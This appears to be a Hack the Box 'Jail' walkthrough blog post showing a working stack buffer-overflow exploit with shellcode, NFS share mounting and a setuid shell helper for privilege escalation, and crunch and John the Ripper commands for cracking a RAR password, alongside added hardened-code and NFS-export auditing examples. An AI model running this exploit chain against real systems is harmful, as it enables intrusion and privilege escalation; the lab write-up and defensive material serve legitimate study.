Jail — Hack the Box Walkthrough

The segfault is triggered by sending a cyclic string generated with pattern_create as the password: the inserted characters overrun the buffer and corrupt the saved registers.

The password value visible in the crash is the pattern_create string.

As the image shows, EIP is at offset 28, so the saved return address sits 28 bytes past the start of the password buffer.
```python
#!/usr/bin/env python3
# Author's exploit, updated for Python 3 and current pwntools: the Python 2
# str literals become bytes and print becomes a function.
from pwn import *
import struct

# Socket-reuse shellcode: dup2() the connected client socket onto
# stdin/stdout/stderr, then execve("/bin//sh").
shellcode  = b"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
shellcode += b"\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
shellcode += b"\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
shellcode += b"\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += b"\x89\xe3\x31\xc9\xcd\x80"

# 28 bytes of padding reach the saved EIP (the offset found above). The
# return address comes from the author's debugging session and is specific
# to that target and run: it only works while ASLR is off and the stack is
# executable, so expect to re-derive it elsewhere.
payload = b"A" * 28 + struct.pack("<I", 0xffffd612 + 30) + shellcode

r = remote('10.10.10.34', 7411)
r.sendline(b'DEBUG')
print(r.recv(1024))
r.sendline(b'USER admin')
print(r.recv(1024))
r.sendline(b'PASS ' + payload)
r.interactive()
```
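The bug the walkthrough exploits is a fixed-size stack buffer that receives the PASS argument without a length check, so 28 bytes of padding reach the saved return address. The C below is an added illustration written for this page, not jail.c and not the author's code: `check_pass_vulnerable` is the unbounded-copy pattern, and `check_pass_hardened` is the bounded form that rejects oversized input before it touches the buffer. `PASS_MAX`, the expected password `hunter2` and the function names are constructed for the example; the real jail.c layout is not shown on this page.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Constructed buffer size and password for this illustration; the real
 * jail.c layout is not known from the walkthrough. */
#define PASS_MAX 16
static const char *EXPECTED_PASS = "hunter2";

/* Vulnerable pattern: strcpy() copies until the NUL of arg, however long,
 * so a password longer than PASS_MAX overwrites whatever follows the
 * buffer on the stack (saved EBP, then the return address). Never feed
 * this attacker-controlled input; it is here only for contrast. */
int check_pass_vulnerable(const char *arg)
{
    char password[PASS_MAX];
    strcpy(password, arg);                 /* no bound: the overflow */
    return strcmp(password, EXPECTED_PASS) == 0;
}

/* Hardened form: measure the input against the buffer first, reject anything
 * that cannot fit together with its terminating NUL, and copy with an
 * explicit length. Returns 1 on match, 0 on mismatch, -1 when rejected. */
int check_pass_hardened(const char *arg)
{
    char password[PASS_MAX];
    size_t n = strnlen(arg, PASS_MAX);     /* stops scanning at PASS_MAX */
    if (n >= PASS_MAX)
        return -1;                         /* would need n + 1 bytes */
    memcpy(password, arg, n + 1);          /* n bytes plus the NUL */
    return strcmp(password, EXPECTED_PASS) == 0 ? 1 : 0;
}

/* Builds a run of 'A's of the given length (like the walkthrough's padding)
 * and reports whether the hardened checker rejects it. */
int hardened_rejects_padding(size_t len)
{
    char buf[256];
    if (len >= sizeof buf)
        return 0;
    memset(buf, 'A', len);
    buf[len] = '\0';
    return check_pass_hardened(buf) == -1;
}

int main(void)
{
    printf("hunter2  -> %d\n", check_pass_hardened("hunter2"));
    printf("wrong    -> %d\n", check_pass_hardened("wrong"));
    printf("28 x 'A' -> rejected=%d\n", hardened_rejects_padding(28));
    return 0;
}
```

The bounded copy removes the bug; the toolchain mitigations the payload above depends on being absent are the second layer. A hard-coded stack address and shellcode executed from the stack only work with ASLR off and an executable stack, so building the daemon with `-fstack-protector-strong`, PIE and a non-executable stack would each independently defeat this particular payload even if the copy were left unbounded.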
```
root@kali:~/Downloads# showmount -e 10.10.10.34
Export list for 10.10.10.34:
/opt *
/var/nfsshare *
root@kali:~# mount -t nfs 10.10.10.34:/var/nfsshare /tmp/nfsshare
root@kali:~# mount -t nfs 10.10.10.34:/opt /tmp/opt
```
root@kali:~/Documents# cat setuid.c

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Compiled on the attacking box and placed on the NFS share; when run on the
 * target it switches both real and effective UID to 1000 and spawns a shell. */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;
    if (setreuid(1000, 1000) != 0) {    /* bail out if the UID change failed */
        perror("setreuid");
        return 1;
    }
    printf("Effective ID is: %d\n", geteuid());
    printf("Real ID is: %d\n", getuid());
    char *const sh_argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", sh_argv, NULL);
    perror("execve");                   /* only reached if the exec failed */
    return 1;
}
```
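Both shares are exported to `*`, and the setuid helper above only works if the server honours ownership and setuid bits set from a client, which means the export is also configured with `no_root_squash` (an assumption consistent with the walkthrough; the target's real /etc/exports is not shown on this page). As an added defensive example that is not part of the walkthrough, the C below parses /etc/exports lines and flags world clients, `rw` and `no_root_squash`. The sample lines are constructed for the example; the first two mirror the paths showmount listed.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Findings returned as a bitmask by audit_export_line(). */
enum {
    EXP_WORLD          = 1,   /* client is "*" (or empty, i.e. everyone) */
    EXP_NO_ROOT_SQUASH = 2,   /* client root keeps root on the server */
    EXP_WRITABLE       = 4    /* rw option present */
};

/* Parse one /etc/exports line of the form
 *   /path  client1(opt,opt)  client2(opt)
 * and return the EXP_* flags that apply. Comments and blank lines give 0.
 * A space before "(" ("host (rw)") makes exportfs apply the options to
 * everyone; the parser reproduces that, because the "(rw)" token then has
 * an empty client and is flagged EXP_WORLD. */
int audit_export_line(const char *line)
{
    char buf[512];
    char *save = NULL, *tok;
    int flags = 0;

    strncpy(buf, line, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    buf[strcspn(buf, "#\n")] = '\0';       /* strip comment and newline */

    if ((tok = strtok_r(buf, " \t", &save)) == NULL)
        return 0;                          /* blank or comment-only line */

    while ((tok = strtok_r(NULL, " \t", &save)) != NULL) {
        char *opts = strchr(tok, '(');
        if (opts != NULL) {
            *opts++ = '\0';                /* tok is now the client only */
            char *close = strchr(opts, ')');
            if (close != NULL)
                *close = '\0';
        }
        if (tok[0] == '\0' || strcmp(tok, "*") == 0)
            flags |= EXP_WORLD;
        if (opts != NULL) {
            char *osave = NULL, *o;
            for (o = strtok_r(opts, ",", &osave); o != NULL;
                 o = strtok_r(NULL, ",", &osave)) {
                if (strcmp(o, "no_root_squash") == 0)
                    flags |= EXP_NO_ROOT_SQUASH;
                else if (strcmp(o, "rw") == 0)
                    flags |= EXP_WRITABLE;
            }
        }
    }
    return flags;
}

/* Constructed sample /etc/exports (not the target's real file). The first
 * two entries mirror the shares showmount listed as exported to "*". */
static const char *SAMPLE_EXPORTS[] = {
    "# constructed sample",
    "/opt           *(rw,sync,no_root_squash)",
    "/var/nfsshare  *(rw,sync,no_root_squash)",
    "/srv/backup    10.10.10.0/24(ro,sync,root_squash)",
    "/home/export   *(ro)",
};
#define SAMPLE_COUNT (sizeof SAMPLE_EXPORTS / sizeof SAMPLE_EXPORTS[0])

/* Number of sample lines that are both world-exported and skip root squash:
 * the combination that lets any client place setuid files on the share. */
int count_world_no_root_squash(void)
{
    int n = 0;
    for (size_t i = 0; i < SAMPLE_COUNT; i++) {
        int f = audit_export_line(SAMPLE_EXPORTS[i]);
        if ((f & EXP_WORLD) && (f & EXP_NO_ROOT_SQUASH))
            n++;
    }
    return n;
}

int main(void)
{
    for (size_t i = 0; i < SAMPLE_COUNT; i++) {
        int f = audit_export_line(SAMPLE_EXPORTS[i]);
        if (f == 0)
            continue;
        printf("%-50s%s%s%s\n", SAMPLE_EXPORTS[i],
               f & EXP_WORLD ? " [world]" : "",
               f & EXP_NO_ROOT_SQUASH ? " [no_root_squash]" : "",
               f & EXP_WRITABLE ? " [rw]" : "");
    }
    printf("world + no_root_squash: %d\n", count_world_no_root_squash());
    return 0;
}
```

The fix for a flagged line is to restrict the client list to the hosts that need the share, keep the default `root_squash`, and add `nosuid` on the client mount so setuid bits on the share are ignored even if the server side is misconfigured.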
```
[frank@localhost nfsshare]$ sudo -l
Matching Defaults entries for frank on this host:
    !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME
    HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG
    LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION
    LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS
    _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User frank may run the following commands on this host:
    (frank) NOPASSWD: /opt/logreader/logreader.sh
    (adm) NOPASSWD: /usr/bin/rvim /var/www/html/jailuser/dev/jail.c
```
```shell
# 11-character candidates: the fixed prefix Morris1962 plus one character
# drawn from the symbols-all charset in place of the @ placeholder
crunch 11 11 -o jail-wlist -f /usr/share/crunch/charset.lst symbols-all -t Morris1962@
# extract the archive hash and run the wordlist against it
rar2john keys.rar > jailhash
john --format=rar --wordlist=jail-wlist jailhash
```

dl padmavathi

I go by Padma. I am a security enthusiast. This blog contains security related and some general stuff. E-mail: pduggire@gmu.edu